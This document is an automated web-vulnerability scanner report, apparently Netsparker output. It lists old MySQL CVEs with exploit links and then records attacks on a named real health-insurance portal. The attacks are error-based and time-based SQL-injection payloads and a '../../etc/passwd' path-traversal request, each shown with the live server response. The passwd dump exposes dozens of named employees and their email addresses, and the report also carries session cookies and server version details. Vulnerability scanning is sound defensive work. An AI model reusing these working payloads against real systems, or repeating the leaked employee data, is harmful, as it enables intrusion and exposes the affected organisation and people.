Oracle MySQL is prone to a security-bypass vulnerability. A local attacker can exploit this issue to delete data associated with arbitrary MyISAM tables. This may result in denial-of-service conditions. Versions prior to MySQL 5.1.46 are vulnerable.

External References

CVE-2010-1626

MySQL with yaSSL SSL Certificate Handling Remote Stack Buffer Overflow Vulnerability

MySQL compiled with yaSSL is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.

External References

CVE-2009-4484

Exploit

http://www.metasploit.com/modules/exploit/linux/mysql/mysql_yassl_getname

MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service Vulnerability

MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. This issue affects MySQL 5.1.23 and prior versions.

External References

CVE-2007-5925

Exploit

http://www.securityfocus.com/bid/26353/exploit

MySQL Rename Table Function Access Validation Vulnerability

MySQL is prone to an access-validation vulnerability because it fails to perform adequate access control. Attackers can exploit this issue to rename arbitrary tables. This could result in denial-of-service conditions and may aid in other attacks. Versions prior to MySQL 4.1.23, 5.0.42, and 5.1.18 are vulnerable.

External References

CVE-2007-2691

MySQL MERGE Privilege Revoke Bypass Vulnerability

MySQL is prone to a vulnerability that allows users with revoked privileges to a particular table to access these tables without permission. Exploiting this issue allows attackers to access data when access privileges have been revoked. The specific impact of this issue depends on the data that the attacker may retrieve.

External References

CVE-2006-4031

MySQL Mysql_real_escape Function SQL Injection Vulnerability

MySQL is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise an application using a vulnerable database or to compromise the database itself. MySQL versions prior to 5.0.22-1-0.1 and prior to 4.1.20 are vulnerable. Other versions may also be affected.

External References

CVE-2006-2753

MySQL Remote Information Disclosure and Buffer Overflow Vulnerabilities

MySQL is prone to multiple remote vulnerabilities: 1. A buffer-overflow vulnerability occurs because the software fails to perform sufficient boundary checks of user-supplied data before copying it to an insufficiently sized memory buffer. This issue allows remote attackers to execute arbitrary machine code in the context of affected database servers. Failed exploit attempts will likely crash the server, denying further service to legitimate users. 2. Two information-disclosure vulnerabilities occur because the software fails to sufficiently sanitize and check boundaries of user-supplied data. These issues allow remote users to gain access to potentially sensitive information that may aid in further attacks.

External References

CVE-2006-1516, CVE-2006-1517, CVE-2006-1518

Exploit

http://www.securityfocus.com/bid/17780/exploit

MySQL Server Str_To_Date Remote Denial Of Service Vulnerability

MySQL is susceptible to a remote denial-of-service vulnerability. This issue is due to the database server's failure to properly handle unexpected input. This issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. Attackers may exploit this issue in conjunction with latent SQL-injection vulnerabilities in other applications. Versions of MySQL prior to 4.1.18, 5.0.19, and 5.1.6 are vulnerable to this issue.

External References

CVE-2006-3081

MySQL Server Date_Format Denial Of Service Vulnerability

MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. This issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. Attackers may exploit this issue in conjunction with latent SQL-injection vulnerabilities in other applications. Versions prior to MySQL 4.1.18, 5.0.19, and 5.1.6 are vulnerable.

External References

CVE-2006-3469

MySQL INFORMATION_SCHEMA Remote Denial Of Service Vulnerability

MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain specially crafted queries. An attacker can exploit this issue to crash the application, denying access to legitimate users. NOTE: An attacker must be able to execute arbitrary SELECT statements against the database to exploit this issue. This may be done through legitimate means or by exploiting other latent SQL-injection vulnerabilities. This issue affects versions prior to MySQL 5.0.32 and 5.1.14.

External References

CVE-2006-7232

Exploit

http://www.securityfocus.com/bid/28351/exploit

MySQL Server Privilege Escalation And Denial Of Service Vulnerabilities

MySQL is prone to multiple vulnerabilities, including privilege-escalation and denial-of-service issues. Exploiting the privilege-escalation vulnerability may allow attackers to perform certain actions with elevated privileges. Successful exploits of the denial-of-service issue will cause the database server to crash, denying service to legitimate users. These issues affect versions prior to MySQL 5.0.52, MySQL 5.1.23, and MySQL 6.0.4.

External References

CVE-2007-6303, CVE-2007-6304

- /Comunicacao/detalhe.do

/Comunicacao/detalhe.do

http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=(select+1+and+row(1%2c1)%..

Version

5.0.77

Request

GET /Comunicacao/detalhe.do?acao=inicial&cdComunicacao=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=5DD9C8CFD3D902CD91DF57B601077A4E.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 15 Nov 2011 17:14:15 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 3405
Connection: close
Content-Type: text/html;charset=utf-8


<html><head><title>Apache Tomcat/5.5.9 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>javax.servlet.ServletException: Duplicate key or integrity constraint violation message from server: &quot;Duplicate entry '_!@4dilemma:0' for key 1&quot; org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:516) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:423) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>root cause</b> <pre>java.sql.SQLException: Duplicate key or integrity constraint violation message from server: &quot;Duplicate entry '_!@4dilemma:0' for key 1&quot; com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1997) com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:1906) com.mysql.jdbc.MysqlIO.nextRow(MysqlIO.java:997) com.mysql.jdbc.MysqlIO.getResultSet(MysqlIO.java:296) com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:1325) com.mysql.jdbc.MysqlIO.sqlQuery(MysqlIO.java:1224) com.mysql.jdbc.Connection.execSQL(Connection.java:2244) com.mysql.jdbc.Connection.execSQL(Connection.java:2192) com.mysql.jdbc.Statement.executeQuery(Statement.java:1163) org.jboss.resource.adapter.jdbc.WrappedStatement.executeQuery(WrappedStatement.java:208) br.com.unimed.portal.veiculocomunicacao.dao.ComunicacaoDAO.populaComunicacao(ComunicacaoDAO.java:459) br.com.unimed.portal.veiculocomunicacao.action.DetalheAction.execute(DetalheAction.java:28) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:421) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:226) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1164) org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:397) javax.servlet.http.HttpServlet.service(HttpServlet.java:697) javax.servlet.http.HttpServlet.service(HttpServlet.java:810) org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:81)</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the Apache Tomcat/5.5.9 logs.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.9</h3></body></html>
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /Comunicacao/img.do

/Comunicacao/img.do

http://www.unimed.com.br/Comunicacao/img.do?cdComunicacao=../../../../../../../../../../../etc/passwd

Identified Internal Path(s)

Request

GET /Comunicacao/img.do?cdComunicacao=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=333
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=954AC776992CF3BD75CB8DB63522214F.dcpr5034; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:15:00 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 4778
Connection: close
Content-Type: image/jpeg;charset=ISO-8859-1


root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinabrt:x:499:499::/etc/abrt:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinsaslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpostgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bashricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologinBrTManag:x:206:206::/usr/local/manager/:/bin/bashtr081902:x:500:500:Renan Nascimento(Equipe BACKUP BRT):/home/tr081902:/bin/bashtr064135:x:501:500:Jeferson de Freitas Salvador(Equipe BACKUP BRT):/home/tr064135:/bin/bashtr043441:x:502:500:Joseval Rosa Gomes da Silva(Equipe BACKUP BRT):/home/tr043441:/bin/bashtr109386:x:1503:500:Michel Maciel Abrão(Equipe BACKUP BRT):/home/tr109386:/bin/bashtr059644:x:1504:500:Marcio de Oliveira Santos(Equipe BACKUP BRT):/home/tr059644:/bin/bashtr096223:x:1505:500:Leonardo de Oliveira Linhares(Equipe BACKUP BRT):/home/tr096223:/bin/bashtr059639:x:506:500:Israel da Silva Otero Seabra(Equipe BACKUP BRT):/home/tr059639:/bin/bashtr109311:x:507:500:João Victor Cano Martins(Equipe BACKUP BRT):/home/tr109311:/bin/bashtr123620:x:508:500:Francisco José de Souza(Equipe BACKUP BRT):/home/tr123620:/bin/bashtr132756:x:509:500:Alex Barcelos Soares(Equipe BACKUP BRT):/home/tr132756:/bin/bashtr129388:x:510:500:Andre dos Santos Amorim(Equipe BACKUP BRT):/home/tr129388:/bin/bashtr076116:x:511:500:Marco Antônio Alves de Oliveira(Equipe BACKUP BRT):/home/tr076116:/bin/bashtr155502:x:512:500:CRISTIANO FERREIRA DA SILVA (Equipe Backup):/home/tr155502:/bin/bashtr086980:x:513:501:Adriana Pegado Rolim Rodrigues Martins (adriana.martins@b2br.com.br):/home/tr086980:/bin/bashtr120637:x:514:501:Ulisses Oliveira de Castro (ulisses.castro@b2br.com.br):/home/tr120637:/bin/bashtr116313:x:515:501:Fabio Kuhl Lima (fabio.lima@b2br.com.br):/home/tr116313:/bin/bashtr076108:x:516:501:Sergio Fernando Mattar (sergio.mattar@b2br.com.br):/home/tr076108:/bin/bashtr088371:x:517:501:Alexandre Wagner Agostini (alexandre.agostini@b2br.com.br):/home/tr088371:/bin/bashtr076062:x:518:501:Julio César Pastro Meira (julio.meira@b2br.com.br):/home/tr076062:/bin/bashtr097180:x:519:501:Rafael Vargas (rafael.vargas@b2br.com.br):/home/tr097180:/bin/bashtr133477:x:520:501:Uriel Baesso do Prado:/home/tr133477:/bin/bashtr076104:x:521:501:Claude Florencio:/home/tr076104:/bin/bashtr107011:x:522:501:Germano Lira:/home/tr107011:/bin/bashtr160491:x:523:501:Wesley Dantas:/home/tr160491:/bin/bashadmportal:x:503:504:Usuario Aplicacao - Portal Unimed:/home/admportal:/bin/bashtomcat:x:505:506:Usuario Jboss:/home/tomcat:/bin/bashdynamix:x:504:505::/home/dynamix:/bin/bashtr165773:x:1506:501:PHILIPP FREGOLAO KREUSCHER - ADM UNIX:/home/tr165773:/bin/bashdcpu0012:x:620:504:GIOVANI VARGAS POLETTO - Cliente CYDC - Portal Unimed:/home/dcpu0012:/bin/bashbt050745:x:1507:501:ADM UNIX - Joaquim Magalhaes Neto:/home/bt050745:/bin/bashbt051010:x:1508:501:ADM UNIX - Judson Pires Junior:/home/bt051010:/bin/bashoi85307:x:1509:501:ADM UNIX - Eduardo Moreira Fraga:/home/oi85307:/bin/bashtr126097:x:1510:501:ADM UNIX - Washington da Costa Mota:/home/tr126097:/bin/bashtr108487:x:1511:500:ADM BKP - Glauber Estacio da Conceicao Queiroz:/home/tr108487:/bin/bashtr155497:x:1512:500:ADM BKP - Thayller Augusto Monturil do Nascimento:/home/tr155497:/bin/bashtr168780:x:1513:500:ADM BKP - Frederico Silva Monteiro:/home/tr168780:/bin/bashtr168779:x:1514:500:ADM BKP - Leonardo Xavier:/home/tr168779:/bin/bashtr168808:x:1515:500:ADM BKP - Filipe Fagundes Vieira:/home/tr168808:/bin/bashtr168809:x:1516:500:ADM BKP - Lucas Torres Lima:/home/tr168809:/bin/bashtr151222:x:1517:500:ADM BKP - Adriano Araujo Cavalcanti:/home/tr151222:/bin/bash
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.

External References

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /Comunicacao/busca.do

/Comunicacao/busca.do

http://www.unimed.com.br/Comunicacao/busca.do

Identified Internal Path(s)

c:\boot.ini

Request

POST /Comunicacao/busca.do HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/busca.do
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.unimed.com.br
Cookie: JSESSIONID=58AD09A58DB8BEDB9A96B0F24E5D612C.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Content-Length: 143
Expect: 100-continue
Accept-Encoding: gzip, deflate

acao=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--&cdUnimed=3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:13:32 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><meta http-equiv="Content-Language" content="pt-BR"><title>Portal Nacional de Saúde :: Unimed do Brasil</title><meta name="description" content="Modelo de site externo com barra de menu."><meta name="keywords" content="Unimed, portal, saude, Brasil"><meta name="author" content="Dynamix Software Ltda (www.dynamix.com.br)."><meta name="copyright" content="Copyright (c) 2004 Dynamix Software Ltda."><!-- barra de navegacao --><link rel="stylesheet" type="text/css" href="./colaborador.css"><link rel="stylesheet" type="text/css" href="./estilos.css"><!-- folhas de estilo --></head><body><!-- INI TOPO --><div id="topo"><!-- ini logo unimed --><h1><img src="./imagens/logo_unimed.gif" alt="Unimed." title="Unimed."></h1><!-- fim logo unimed --><!-- ini fechar --><div><a href="javascript:window.close()" title="Fechar este site externo.">Fechar</a></div><!-- fim fechar --></div><!-- FIM TOPO --><!-- INI CONTEUDO --><div id="conteudo"><table class="estrutura" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="top"><!-- ini barra de menu --><div class="menu"><!-- ini nome da unimed --><div class="nomeUnimed"><!-- Joaçaba --></div><!-- fim nome da unimed --><!-- ini menu --><ul><li class="titulo"><a href="#" class="titulo"><img class="seta" src="./imagens/seta_branca_abaixo.gif" alt="Voltar" border="0"><span></span></a>Veículos de Comunicação</li><li class="item"><a href="/Comunicacao/novo.do">Incluir Ve&iacute;culo de Comunica&ccedil;&atilde;o</a> </li><li class="item"><a href="/Comunicacao/busca.do?acaoLink=pesquisa">Consultar Ve&iacute;culos de Comunica&ccedil;&atilde;o</a></li><li class="item"><a href="/Comunicacao/busca.do?acaoLink=pesquisaDetalhe">Detalhe Ve&iacute;culos de Comunica&ccedil;&atilde;o</a></li></ul><!-- fim menu --></div><!-- fim barra de menu --></td><td><!-- ini cabecalho --><div class="cabecalho"><h2>Ve&iacute;culos de Comunica&ccedil;&atilde;o do Sistema Unimed </h2></div><!-- fim cabecalho --><!-- ini corpo --><div class="corpo"><!-- ini navegacao persistente -->Ve&iacute;culos de Comunica&ccedil;&atilde;o<!-- fim navegacao persistente --><!-- ini nome secao --><h4>Consultar Ve&iacute;culo </h4><!-- fim nome secao --><!-- ini conteudo da pagina --><div><form name="buscaForm" method="post" action="/Comunicacao/busca.do"><input type="hidden" name="acao" value="c:\boot.ini"><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td><p class="b"><b>Buscar por Unimed:</b><br><br><select name="cdUnimed"><option selected value="">Selecione:</option> <option value="865">CENTRAL NACIONAL UNIMED</option>
<option value="67">CENTRAL NACIONAL UNIMED - CLIENTES CARTEIRA 067</option>
<option value="974">CONFEDERAÇÃO NORTE/NORDESTE</option>
<option value="998">ESCRITÓRIO REGIONAL DE BRASÍLIA - ASSESSORIA JURÍDICA</option>
<option value="861">FEDERAÇÃO DA INCONFIDÊNCIA MINEIRA</option>
<option value="859">FEDERAÇÃO DA ZONA DA MATA MINEIRA</option>
<option value="985">FEDERAÇÃO DAS UNIMEDS DA AMAZÔNIA - FAMA</option>
<option value="515">FEDERAÇÃO DAS UNIMEDS DO DISTRITO FEDERAL E REGIÃO METROPOLITANA (EXTINTA)</option>
<option value="977">FEDERAÇÃO DO ESTADO DA BAHIA</option>
<option value="982">FEDERAÇÃO DO ESTADO DA PARAÍBA</option>
<option value="976">FEDERAÇÃO DO ESTADO DE SANTA CATARINA</option>
<option value="979">FEDERAÇÃO DO ESTADO DO CEARÁ</option>
<option value="989">FEDERAÇÃO DO ESTADO DO MATO GROSSO DO SUL</option>
<option value="975">FEDERAÇÃO DO ESTADO DO PARANÁ</option>
<option value="987">FEDERAÇÃO DO ESTADO DO PIAUÍ</option>
<option value="972">FEDERAÇÃO DO ESTADO DO RIO DE JANEIRO</option>
<option value="980">FEDERAÇÃO DO ESTADO DO RIO GRANDE DO NORTE</option>
<option value="973">FEDERAÇÃO INTERFEDERATIVA DO ESTADO DE MINAS GERAIS</option>
<option value="853">FEDERAÇÃO INTRAFEDERATIVA DO TRIÂNGULO MINEIRO E ALTO DO PARANAÍBA</option>
<option value="857">FEDERAÇÃO INTRAFEDERATIVA REGIONAL SUL DE MINAS</option>
<option value="858">FEDERAÇÃO LESTE NORDESTE DE MINAS</option>
<option value="501">FUNDAÇÃO UNIMED</option>
<option value="500">PORTAL UNIMED LTDA</option>
<option value="1002">UNIAIR</option>
<option value="11">UNIMED ABC</option>
<option value="309">UNIMED ABOLIÇÃO</option>
<option value="329">UNIMED ADAMANTINA</option>
<option value="997">UNIMED ADMINISTRAÇÃO E SERVIÇOS LTDA.</option>
<option value="308">UNIMED AGRESTE MERIDIONAL</option>
<option value="983">UNIMED ALAGOAS</option>
<option value="313">UNIMED ALAGOINHAS</option>
<option value="319">UNIMED ALEGRETE</option>
<option value="258">UNIMED ALÉM PARAÍBA</option>
<option value="240">UNIMED ALFENAS</option>
<option value="100">UNIMED ALTO DA SERRA</option>
<option value="613">UNIMED ALTO IRANI</option>
<option value="260">UNIMED ALTO JACUÍ</option>
<option value="195">UNIMED ALTO OESTE POTIGUAR</option>
<option value="310">UNIMED ALTO PARANAÍBA</option>
<option value="237">UNIMED ALTO SÃO FRANCISCO</option>
<option value="270">UNIMED ALTO URUGUAI</option>
<option value="300">UNIMED ALTO VALE</option>
<option value="192">UNIMED AMPARO</option>
<option value="178">UNIMED ANÁPOLIS</option>
<option value="295">UNIMED ANDRADAS</option>
<option value="489">UNIMED ANDRADINA</option>
<option value="341">UNIMED ANGRA DOS REIS</option>
<option value="151">UNIMED APUCARANA</option>
<option value="118">UNIMED AQUIDAUANA</option>
<option value="72">UNIMED ARAÇATUBA</option>
<option value="235">UNIMED ARAGUAIA (EX BARRA DO GARÇAS)</option>
<option value="264">UNIMED ARAGUAÍNA</option>
<option value="122">UNIMED ARAGUARI</option>
<option value="13">UNIMED ARARAQUARA</option>
<option value="120">UNIMED ARARAS</option>
<option value="290">UNIMED ARARUAMA</option>
<option value="164">UNIMED ARAXÁ</option>
<option value="320">UNIMED ARIQUEMES</option>
<option value="115">UNIMED ASSIS</option>
<option value="73">UNIMED AVARÉ</option>
<option value="160">UNIMED BARBACENA</option>
<option value="52">UNIMED BARRA MANSA</option>
<option value="267">UNIMED BARRETOS</option>
<option value="109">UNIMED BATATAIS</option>
<option value="22">UNIMED BAURU</option>
<option value="165">UNIMED BEBEDOURO</option>
<option value="88">UNIMED BELÉM</option>
<option value="6">UNIMED BELO HORIZONTE</option>
<option value="134">UNIMED BETIM</option>
<option value="197">UNIMED BIRIGUI</option>
<option value="26">UNIMED BLUMENAU</option>
<option value="136">UNIMED BOA VISTA</option>
<option value="24">UNIMED BOTUCATU</option>
<option value="327">UNIMED BRAGANÇA PAULISTA</option>
<option value="66">UNIMED BRASÍLIA</option>
<option value="331">UNIMED BRUSQUE</option>
<option value="125">UNIMED CABO FRIO</option>
<option value="332">UNIMED CAÇADOR</option>
<option value="91">UNIMED CAÇAPAVA</option>
<option value="318">UNIMED CÁCERES</option>
<option value="206">UNIMED CAICÓ</option>
<option value="534">UNIMED CAJAZEIRAS</option>
<option value="297">UNIMED CALDAS NOVAS</option>
<option value="35">UNIMED CAMPINA GRANDE</option>
<option value="2">UNIMED CAMPINAS</option>
<option value="239">UNIMED CAMPO BELO</option>
<option value="51">UNIMED CAMPO GRANDE</option>
<option value="205">UNIMED CAMPOS</option>
<option value="268">UNIMED CAMPOS DO JORDÃO</option>
<option value="611">UNIMED CANOINHAS</option>
<option value="153">UNIMED CAPIVARI</option>
<option value="173">UNIMED CARATINGA</option>
<option value="107">UNIMED CARIRI</option>
<option value="174">UNIMED CARUARU</option>
<option value="158">UNIMED CASCAVEL</option>
<option value="189">UNIMED CATAGUASES</option>
<option value="114">UNIMED CATALÃO</option>
<option value="16">UNIMED CATANDUVA</option>
<option value="1313">UNIMED CENTRAL DE SERVIÇOS AUXILIARES- RS</option>
<option value="53">UNIMED CENTRO - RS</option>
<option value="852">UNIMED CENTRO PAULISTA</option>
<option value="60">UNIMED CENTRO SUL (EXTINTA)</option>
<option value="248">UNIMED CENTRO SUL FLUMINENSE (EX BARRA DO PIRAÍ)</option>
<option value="238">UNIMED CENTRO-OESTE (EX PARÁ DE MINAS)</option>
<option value="855">UNIMED CENTRO-OESTE PAULISTA</option>
<option value="988">UNIMED CERRADO</option>
<option value="225">UNIMED CHAPADA DIAMANTINA</option>
<option value="227">UNIMED CHAPECÓ</option>
<option value="182">UNIMED CIANORTE</option>
<option value="156">UNIMED CIRCUITO DAS ÁGUAS</option>
<option value="627">UNIMED CONCÓRDIA</option>
<option value="85">UNIMED CONSELHEIRO LAFAIETE</option>
<option value="2000">UNIMED COOPERATIVA CENTRAL DE BENS E SERVIÇOS</option>
<option value="502">UNIMED COOPERATIVA CENTRAL DE BENS E SERVIÇOS - CAPIVARI</option>
<option value="281">UNIMED CORUMBÁ</option>
<option value="180">UNIMED COSTA DO SOL</option>
<option value="116">UNIMED COSTA OESTE</option>
<option value="231">UNIMED COSTA VERDE</option>
<option value="198">UNIMED CRICIÚMA</option>
<option value="10">UNIMED CRUZEIRO</option>
<option value="56">UNIMED CUIABÁ</option>
<option value="32">UNIMED CURITIBA</option>
<option value="628">UNIMED CURITIBANOS</option>
<option value="124">UNIMED CURRAIS NOVOS</option>
<option value="144">UNIMED DIVINÓPOLIS</option>
<option value="999">UNIMED DO BRASIL CONFEDERAÇÃO NACIONAL DAS COOPERATIVAS MÉDICAS</option>
<option value="984">UNIMED DO ES - FEDERAÇÃO DO ESTADO DO ESPÍRITO SANTO</option>
<option value="970">UNIMED DO ESTADO DE SÃO PAULO</option>
<option value="163">UNIMED DO SUDOESTE</option>
<option value="78">UNIMED DOURADOS</option>
<option value="232">UNIMED DRACENA</option>
<option value="269">UNIMED DUQUE DE CAXIAS (EXTINTA)</option>
<option value="277">UNIMED ENCOSTA DA SERRA/RS</option>
<option value="960">UNIMED EQUATORIAL</option>
<option value="28">UNIMED ERECHIM</option>
<option value="148">UNIMED EXTREMO OESTE CATARINENSE</option>
<option value="224">UNIMED EXTREMO SUL</option>
<option value="512">UNIMED FEDERAÇÃO BAIANA</option>
<option value="511">UNIMED FEDERAÇÃO DO ESTADO DO MATO GROSSO</option>
<option value="978">UNIMED FEDERAÇÃO INTERFEDERATIVA DO CENTRO OESTE E TOCANTINS</option>
<option value="103">UNIMED FEIRA DE SANTANA</option>
<option value="105">UNIMED FERNANDÓPOLIS</option>
<option value="301">UNIMED FERRABRAZ</option>
<option value="63">UNIMED FORTALEZA</option>
<option value="167">UNIMED FOZ DO IGUAÇU</option>
<option value="9">UNIMED FRANCA</option>
<option value="168">UNIMED FRANCISCO BELTRÃO</option>
<option value="339">UNIMED FRUTAL</option>
<option value="171">UNIMED GERAIS DE MINAS</option>
<option value="316">UNIMED GOIANÉSIA</option>
<option value="64">UNIMED GOIÂNIA</option>
<option value="236">UNIMED GOVERNADOR VALADARES</option>
<option value="25">UNIMED GRANDE FLORIANÓPOLIS</option>
<option value="76">UNIMED GUARAPUAVA</option>
<option value="215">UNIMED GUARARAPES</option>
<option value="20">UNIMED GUARATINGUETÁ</option>
<option value="280">UNIMED GUARUJÁ</option>
